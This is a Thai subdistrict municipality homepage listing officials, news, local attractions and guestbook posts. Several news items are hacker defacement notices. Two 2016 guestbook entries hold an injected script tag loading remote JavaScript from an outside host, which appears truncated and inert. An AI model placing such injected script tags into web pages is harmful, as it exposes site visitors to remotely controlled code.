ยินดีต้อนรับสู่เว็บไซต์เทศบาลตำบลป่าก่อดำ อำเภอแม่ลาว จังหวัดเชียงราย

 
 
 
 

 
 
 

นายประสงค์ เมืองมูล
ปลัดเทศบาลตำบลป่าก่อดำ

นายเกษม ศรีหมื่น
กำนันตำบลป่าก่อดำ

 

 
 
6 มกราคม 2558
Hacked By ant07alya & tmp9dEplN #ANKA TIM TURKHACKTEAM.ORG
Hacked By ant07alya & tmp9dEplN #ANKA TIM TURKHACKTEAM.ORG ..
1 มกราคม 2558
Hacked By ant07alya & tmp9dEplN #ANKA TIM TURKHACKTEAM.ORG
Hacked By ant07alya & tmp9dEplN #ANKA TIM TURKHACKTEAM.ORG ..
26 มีนาคม 2557
Hacked By ant07alya & tmp9dEplN #ANKA TIM TURKHACKTEAM.ORG
Hacked By ant07alya & tmp9dEplN #ANKA TIM TURKHACKTEAM.ORG ..
1 มกราคม 2557
ประชาสัมพันธ์การรับสมัครงานคนงานไทยไปทำงานต่างประเทศ
ประชาสัมพันธ์การรับสมัครงานคนงานไทยไปทำงานต่างประเทศ ..
12 ธันวาคม 2556
โครงการเทศบาลตำบลป่าก่อดำเคลื่อนที่ ประจำปี 2556
โครงการเทศบาลตำบลป่าก่อดำเคลื่อนที่ ประจำปี 2556 ..
 
     
 
วัดบุญเรืองป่าก่อดำ
สถานที่ท่องเที่ยวด้านการศึกษาศาสนนาและวัฒนธรรม ..
 
 
 
     
 
กลุ่มเย็บปักักร้อย มีสินค้าประเภทเครือ่งประดับ เสื้อผ้าถัก ทอจากมือ
กลุ่มเย็บปักักร้อย มีสินค้าประเภทเครือ่งประดับ เสื้อผ้าถัก ทอจากมือ ..
 
 

 
 
aaa <script type="text/javascript" src="http://yourjavascript.com/12211123610/1.js&quo [2016-02-12] ( 0 / 1 )
aaa <script type="text/javascript" src="http://yourjavascript.com/12211123610/1.js&quo [2016-02-12] ( 0 / 4 )
aaaa ededed [2016-02-12] ( 0 / 1 )
เขตรับผิดชอบ b [2016-02-03] ( 0 / 4 )
ลงทะเบียนผู้สูงอายุ วรินทร [2015/11/18] ( 7 / 166 )
แจ้งไฟฟ้าไม่ดี สมพร [2014-11-12] ( 0 / 143 )
สอบถามตำแหน่งว่าง เฟริน [2014/06/17] ( 1 / 239 )
 


 
  เลขที่ 333 หมู่ที่ 8 ต.ป่าก่อดำ อ.แม่ลาว จ.เชียงราย 57250 เบอร์โทรศัพท์ 053-666694
โทร : แฟกซ์ : E-mail : info@pkdcity.com
Copyright © 2013 pkdcity.com All rights reserved. [สำหรับผู้ดูแล]